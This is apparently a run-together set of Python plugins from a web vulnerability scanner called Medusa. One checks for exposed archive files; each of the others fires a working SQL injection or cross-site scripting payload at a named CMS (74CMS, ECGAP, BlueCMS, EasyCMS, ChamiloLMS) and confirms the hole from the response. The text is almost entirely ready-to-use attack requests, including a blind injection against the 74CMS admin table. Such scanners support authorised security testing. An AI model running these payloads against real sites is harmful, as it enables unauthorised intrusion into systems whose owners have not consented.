def CompressedFileThread(self, urls, Algroup, Name, Affects): try: resp = self.GetRequest(urls) con = resp.text code = resp.status_code if code == 200 and ( resp.headers.get("Content-Type") == "application/zip" or resp.headers.get("Content-Type") == "application/x-rar-compressed" or resp.headers.get("Content-Type") == "application/x-gzip" or resp.headers.get("Content-Type") == "application/gzip"): Medusa = "{}存在{}\r\n漏洞详情:{}\r\n".format(urls, Name, con) _t = TargetInfo(Medusa, Algroup, Name, Affects) VulnerabilityDetails(_t.info, urls, self.Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(self.TargetUrl), str(Medusa)) except Exception as e: _l = ErrorLog().Write(urls, Name) # 调用写入类传入URL和错误插件名 _ = TargetInfo('', Algroup, Name, Affects).info.get('algroup') ErrorHandling().Outlier(e, _)
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),1,1))=97 as signed) %23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port Payloads = [ "/Login/Log.aspx?loginname=", "/ViewSource/SrcWorkProgram.aspx?infoflowId=", "/OnlineQuery/GetFlowItem.aspx?DeptId=" ] for payload in Payloads: try: data = "%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--" payload_url = scheme + "://" + url + ":" + str( port) + payload + data resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( "81dc9bdb52d04dc20036dbd8313ed055") != -1: Medusa = "{}存在ECGAPSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("63e1f04640e83605c1d177544a5a0488") != -1: Medusa = "{}存在BlueCMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent" data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert({})%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''.format( rm) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( "<td><img src=x onerror=alert({})></td>".format(rm)) != -1: Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format( rm) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("<script>confirm({})</script>".format(rm)) != -1: Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名